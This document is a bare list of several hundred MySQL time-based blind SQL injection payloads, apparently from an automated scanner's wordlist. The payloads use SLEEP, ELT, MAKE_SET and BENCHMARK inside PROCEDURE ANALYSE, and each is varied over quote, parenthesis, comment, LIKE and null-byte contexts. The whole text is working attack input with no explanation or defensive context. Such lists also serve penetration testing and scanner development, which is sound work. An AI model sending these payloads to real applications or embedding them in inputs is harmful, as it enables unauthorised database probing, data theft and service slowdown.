' WHERE 1457=1457 AND ELT(6308=6308,SLEEP(15))-- 
" WHERE 2450=2450 AND ELT(6308=6308,SLEEP(15))-- 
 WHERE 4701=4701 AND ELT(6308=6308,SLEEP(15))-- 
')) AS OlPg WHERE 7232=7232 AND ELT(6308=6308,SLEEP(15))-- 
")) AS FGEw WHERE 1632=1632 AND ELT(6308=6308,SLEEP(15))-- 
)) AS UBnq WHERE 3468=3468 AND ELT(6308=6308,SLEEP(15))-- 
') AS HJam WHERE 1286=1286 AND ELT(6308=6308,SLEEP(15))-- 
") AS KEEO WHERE 6323=6323 AND ELT(6308=6308,SLEEP(15))-- 
) AS zWLj WHERE 1327=1327 AND ELT(6308=6308,SLEEP(15))-- 
'||(SELECT 'HlrA' FROM DUAL WHERE 4836=4836 AND ELT(6308=6308,SLEEP(15)))||'
'||(SELECT 'vnyr' WHERE 7322=7322 AND ELT(6308=6308,SLEEP(15)))||'
'+(SELECT fnzK WHERE 8121=8121 AND ELT(6308=6308,SLEEP(15)))+'
'+(SELECT 'dWLq' WHERE 2659=2659 AND ELT(6308=6308,SLEEP(15)))+'
' IN BOOLEAN MODE) AND ELT(6308=6308,SLEEP(15))#
) OR ELT(1464=1464,SLEEP(15))
') OR ELT(1464=1464,SLEEP(15))
' OR ELT(1464=1464,SLEEP(15))
" OR ELT(1464=1464,SLEEP(15))
) OR ELT(1464=1464,SLEEP(15)) AND (5299=5299
)) OR ELT(1464=1464,SLEEP(15)) AND ((5448=5448
))) OR ELT(1464=1464,SLEEP(15)) AND (((9780=9780
 OR ELT(1464=1464,SLEEP(15))
') OR ELT(1464=1464,SLEEP(15)) AND ('WPQA'='WPQA
')) OR ELT(1464=1464,SLEEP(15)) AND (('SSlp'='SSlp
'))) OR ELT(1464=1464,SLEEP(15)) AND ((('zKQI'='zKQI
' OR ELT(1464=1464,SLEEP(15)) AND 'pBpk'='pBpk
') OR ELT(1464=1464,SLEEP(15)) AND ('dPyK' LIKE 'dPyK
')) OR ELT(1464=1464,SLEEP(15)) AND (('tPMs' LIKE 'tPMs
'))) OR ELT(1464=1464,SLEEP(15)) AND ((('lBWw' LIKE 'lBWw
' OR ELT(1464=1464,SLEEP(15)) AND 'wxRQ' LIKE 'wxRQ
") OR ELT(1464=1464,SLEEP(15)) AND ("nhMm"="nhMm
")) OR ELT(1464=1464,SLEEP(15)) AND (("glwu"="glwu
"))) OR ELT(1464=1464,SLEEP(15)) AND ((("AtSc"="AtSc
" OR ELT(1464=1464,SLEEP(15)) AND "iHhp"="iHhp
") OR ELT(1464=1464,SLEEP(15)) AND ("QxeB" LIKE "QxeB
")) OR ELT(1464=1464,SLEEP(15)) AND (("rRTL" LIKE "rRTL
"))) OR ELT(1464=1464,SLEEP(15)) AND ((("esVk" LIKE "esVk
" OR ELT(1464=1464,SLEEP(15)) AND "JBsx" LIKE "JBsx
%') OR ELT(1464=1464,SLEEP(15)) AND ('%'='
%')) OR ELT(1464=1464,SLEEP(15)) AND (('%'='
%'))) OR ELT(1464=1464,SLEEP(15)) AND ((('%'='
%' OR ELT(1464=1464,SLEEP(15)) AND '%'='
%") OR ELT(1464=1464,SLEEP(15)) AND ("%"="
%")) OR ELT(1464=1464,SLEEP(15)) AND (("%"="
%"))) OR ELT(1464=1464,SLEEP(15)) AND ((("%"="
%" OR ELT(1464=1464,SLEEP(15)) AND "%"="
%00') OR ELT(1464=1464,SLEEP(15)) AND ('KJjt'='KJjt
%00')) OR ELT(1464=1464,SLEEP(15)) AND (('uUeZ'='uUeZ
%00'))) OR ELT(1464=1464,SLEEP(15)) AND ((('ukzQ'='ukzQ
%00' OR ELT(1464=1464,SLEEP(15)) AND 'KaMw'='KaMw
 OR ELT(1464=1464,SLEEP(15))-- AfPA
 OR ELT(1464=1464,SLEEP(15))# sLbQ
') WHERE 5244=5244 OR ELT(1464=1464,SLEEP(15))-- 
") WHERE 3797=3797 OR ELT(1464=1464,SLEEP(15))-- 
) WHERE 2721=2721 OR ELT(1464=1464,SLEEP(15))-- 
' WHERE 9993=9993 OR ELT(1464=1464,SLEEP(15))-- 
" WHERE 1249=1249 OR ELT(1464=1464,SLEEP(15))-- 
 WHERE 4418=4418 OR ELT(1464=1464,SLEEP(15))-- 
')) AS NgOn WHERE 6041=6041 OR ELT(1464=1464,SLEEP(15))-- 
")) AS whwo WHERE 1111=1111 OR ELT(1464=1464,SLEEP(15))-- 
)) AS sgJd WHERE 3890=3890 OR ELT(1464=1464,SLEEP(15))-- 
') AS Foth WHERE 2438=2438 OR ELT(1464=1464,SLEEP(15))-- 
") AS azlD WHERE 6449=6449 OR ELT(1464=1464,SLEEP(15))-- 
) AS ZHBW WHERE 1098=1098 OR ELT(1464=1464,SLEEP(15))-- 
'||(SELECT 'ATQP' FROM DUAL WHERE 9254=9254 OR ELT(1464=1464,SLEEP(15)))||'
'||(SELECT 'lezp' WHERE 6677=6677 OR ELT(1464=1464,SLEEP(15)))||'
'+(SELECT VSWo WHERE 5184=5184 OR ELT(1464=1464,SLEEP(15)))+'
'+(SELECT 'LBRs' WHERE 3873=3873 OR ELT(1464=1464,SLEEP(15)))+'
' IN BOOLEAN MODE) OR ELT(1464=1464,SLEEP(15))#
) AND ELT(9309=9309,SLEEP(15))#
') AND ELT(9309=9309,SLEEP(15))#
' AND ELT(9309=9309,SLEEP(15))#
" AND ELT(9309=9309,SLEEP(15))#
)) AND ELT(9309=9309,SLEEP(15))#
))) AND ELT(9309=9309,SLEEP(15))#
 AND ELT(9309=9309,SLEEP(15))#
')) AND ELT(9309=9309,SLEEP(15))#
'))) AND ELT(9309=9309,SLEEP(15))#
") AND ELT(9309=9309,SLEEP(15))#
")) AND ELT(9309=9309,SLEEP(15))#
"))) AND ELT(9309=9309,SLEEP(15))#
%') AND ELT(9309=9309,SLEEP(15))#
%')) AND ELT(9309=9309,SLEEP(15))#
%'))) AND ELT(9309=9309,SLEEP(15))#
%' AND ELT(9309=9309,SLEEP(15))#
%") AND ELT(9309=9309,SLEEP(15))#
%")) AND ELT(9309=9309,SLEEP(15))#
%"))) AND ELT(9309=9309,SLEEP(15))#
%" AND ELT(9309=9309,SLEEP(15))#
%00') AND ELT(9309=9309,SLEEP(15))#
%00')) AND ELT(9309=9309,SLEEP(15))#
%00'))) AND ELT(9309=9309,SLEEP(15))#
%00' AND ELT(9309=9309,SLEEP(15))#
') WHERE 2940=2940 AND ELT(9309=9309,SLEEP(15))#
") WHERE 2223=2223 AND ELT(9309=9309,SLEEP(15))#
) WHERE 2543=2543 AND ELT(9309=9309,SLEEP(15))#
' WHERE 1253=1253 AND ELT(9309=9309,SLEEP(15))#
" WHERE 8650=8650 AND ELT(9309=9309,SLEEP(15))#
 WHERE 2076=2076 AND ELT(9309=9309,SLEEP(15))#
')) AS fOWo WHERE 8077=8077 AND ELT(9309=9309,SLEEP(15))#
")) AS ygBy WHERE 2741=2741 AND ELT(9309=9309,SLEEP(15))#
)) AS WKZK WHERE 4574=4574 AND ELT(9309=9309,SLEEP(15))#
') AS lGoW WHERE 8496=8496 AND ELT(9309=9309,SLEEP(15))#
") AS iIYN WHERE 2133=2133 AND ELT(9309=9309,SLEEP(15))#
) AS mifi WHERE 5350=5350 AND ELT(9309=9309,SLEEP(15))#
'||(SELECT 'SNWh' FROM DUAL WHERE 8300=8300 AND ELT(9309=9309,SLEEP(15))#
'||(SELECT 'jfDT' WHERE 3871=3871 AND ELT(9309=9309,SLEEP(15))#
'+(SELECT JaYN WHERE 6484=6484 AND ELT(9309=9309,SLEEP(15))#
'+(SELECT 'hLQe' WHERE 4272=4272 AND ELT(9309=9309,SLEEP(15))#
' IN BOOLEAN MODE) AND ELT(9309=9309,SLEEP(15))#
) OR ELT(6834=6834,SLEEP(15))#
') OR ELT(6834=6834,SLEEP(15))#
' OR ELT(6834=6834,SLEEP(15))#
" OR ELT(6834=6834,SLEEP(15))#
)) OR ELT(6834=6834,SLEEP(15))#
))) OR ELT(6834=6834,SLEEP(15))#
 OR ELT(6834=6834,SLEEP(15))#
')) OR ELT(6834=6834,SLEEP(15))#
'))) OR ELT(6834=6834,SLEEP(15))#
") OR ELT(6834=6834,SLEEP(15))#
")) OR ELT(6834=6834,SLEEP(15))#
"))) OR ELT(6834=6834,SLEEP(15))#
%') OR ELT(6834=6834,SLEEP(15))#
%')) OR ELT(6834=6834,SLEEP(15))#
%'))) OR ELT(6834=6834,SLEEP(15))#
%' OR ELT(6834=6834,SLEEP(15))#
%") OR ELT(6834=6834,SLEEP(15))#
%")) OR ELT(6834=6834,SLEEP(15))#
%"))) OR ELT(6834=6834,SLEEP(15))#
%" OR ELT(6834=6834,SLEEP(15))#
%00') OR ELT(6834=6834,SLEEP(15))#
%00')) OR ELT(6834=6834,SLEEP(15))#
%00'))) OR ELT(6834=6834,SLEEP(15))#
%00' OR ELT(6834=6834,SLEEP(15))#
') WHERE 5304=5304 OR ELT(6834=6834,SLEEP(15))#
") WHERE 2681=2681 OR ELT(6834=6834,SLEEP(15))#
) WHERE 7820=7820 OR ELT(6834=6834,SLEEP(15))#
' WHERE 2433=2433 OR ELT(6834=6834,SLEEP(15))#
" WHERE 8254=8254 OR ELT(6834=6834,SLEEP(15))#
 WHERE 5665=5665 OR ELT(6834=6834,SLEEP(15))#
')) AS EnTn WHERE 2639=2639 OR ELT(6834=6834,SLEEP(15))#
")) AS Uuyr WHERE 8130=8130 OR ELT(6834=6834,SLEEP(15))#
)) AS SeYB WHERE 9769=9769 OR ELT(6834=6834,SLEEP(15))#
') AS VtAL WHERE 4146=4146 OR ELT(6834=6834,SLEEP(15))#
") AS lzbc WHERE 9439=9439 OR ELT(6834=6834,SLEEP(15))#
) AS hZXa WHERE 5041=5041 OR ELT(6834=6834,SLEEP(15))#
'||(SELECT 'qljG' FROM DUAL WHERE 7183=7183 OR ELT(6834=6834,SLEEP(15))#
'||(SELECT 'vSHo' WHERE 2761=2761 OR ELT(6834=6834,SLEEP(15))#
'+(SELECT Iepa WHERE 6671=6671 OR ELT(6834=6834,SLEEP(15))#
'+(SELECT 'cTBC' WHERE 7090=7090 OR ELT(6834=6834,SLEEP(15))#
' IN BOOLEAN MODE) OR ELT(6834=6834,SLEEP(15))#
) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)
') PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)
' PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)
" PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)
) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (8699=8699
)) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((9071=9071
))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (((3748=3748
 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)
') PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ('UpaO'='UpaO
')) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (('PRZK'='PRZK
'))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((('KGaD'='KGaD
' PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND 'YGol'='YGol
') PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ('QdIy' LIKE 'QdIy
')) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (('SFoL' LIKE 'SFoL
'))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((('lTpp' LIKE 'lTpp
' PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND 'byrr' LIKE 'byrr
") PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ("Vxdv"="Vxdv
")) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (("UjyU"="UjyU
"))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((("sFSz"="sFSz
" PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND "KfIh"="KfIh
") PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ("YSnm" LIKE "YSnm
")) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (("jwwi" LIKE "jwwi
"))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((("LSlz" LIKE "LSlz
" PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND "JGYw" LIKE "JGYw
%') PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ('%'='
%')) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (('%'='
%'))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((('%'='
%' PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND '%'='
%") PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ("%"="
%")) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (("%"="
%"))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((("%"="
%" PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND "%"="
%00') PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ('qNDq'='qNDq
%00')) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND (('PKFj'='PKFj
%00'))) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND ((('qGJU'='qGJU
%00' PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1) AND 'QaCC'='QaCC
 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- jxOQ
 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)# WuDA
') WHERE 5392=5392 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
") WHERE 1602=1602 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
) WHERE 1952=1952 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
' WHERE 6582=6582 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
" WHERE 2544=2544 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
 WHERE 2684=2684 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
')) AS VcJK WHERE 5670=5670 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
")) AS rKsE WHERE 9977=9977 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
)) AS pvGf WHERE 4229=4229 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
') AS mxIY WHERE 5405=5405 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
") AS rltY WHERE 6478=6478 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
) AS XAWU WHERE 4374=4374 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)-- 
'||(SELECT 'AmWI' FROM DUAL WHERE 4187=4187 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1))||'
'||(SELECT 'Zapf' WHERE 4493=4493 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1))||'
'+(SELECT kAdP WHERE 7006=7006 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1))+'
'+(SELECT 'uvWZ' WHERE 6028=6028 PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1))+'
' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(8484,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x47777461))))),1)#
) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
') PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
' PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
" PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
)) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
')) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
'))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
") PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
")) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
"))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%') PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%')) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%'))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%' PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%") PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%")) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%"))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%" PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%00') PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%00')) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%00'))) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
%00' PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
') WHERE 1753=1753 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
") WHERE 5632=5632 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
) WHERE 8223=8223 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
' WHERE 5119=5119 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
" WHERE 7670=7670 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
 WHERE 7397=7397 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
')) AS VtsA WHERE 2864=2864 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
")) AS fQkG WHERE 6666=6666 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
)) AS jUyk WHERE 9720=9720 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
') AS OUMu WHERE 2426=2426 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
") AS iYSh WHERE 1862=1862 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
) AS GrCu WHERE 2189=2189 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
'||(SELECT 'bDsb' FROM DUAL WHERE 4310=4310 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
'||(SELECT 'PziL' WHERE 9669=9669 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
'+(SELECT GmQQ WHERE 4969=4969 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
'+(SELECT 'XWZe' WHERE 6956=6956 PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(1875,CONCAT(0x5c,(BENCHMARK(15000000,MD5(0x64727573))))),1)#
(SELECT (CASE WHEN (9216=9216) THEN SLEEP(15) ELSE 9216*(SELECT 9216 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT * FROM (SELECT(SLEEP(15)))IaWY)
(SELECT (CASE WHEN (8974=8974) THEN (SELECT BENCHMARK(15000000,MD5(0x47506a59))) ELSE 8974*(SELECT 8974 FROM mysql.db) END))
(8607=8607 AND SLEEP(15))
ELT(1595=1595,SLEEP(15))
MAKE_SET(1564=1564,SLEEP(15))
',(SELECT (CASE WHEN (1335=1335) THEN SLEEP(15) ELSE 1335*(SELECT 1335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
,(SELECT (CASE WHEN (1335=1335) THEN SLEEP(15) ELSE 1335*(SELECT 1335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
',(SELECT (CASE WHEN (4702=4702) THEN (SELECT BENCHMARK(15000000,MD5(0x424f7658))) ELSE 4702*(SELECT 4702 FROM mysql.db) END))
,(SELECT (CASE WHEN (4702=4702) THEN (SELECT BENCHMARK(15000000,MD5(0x424f7658))) ELSE 4702*(SELECT 4702 FROM mysql.db) END))
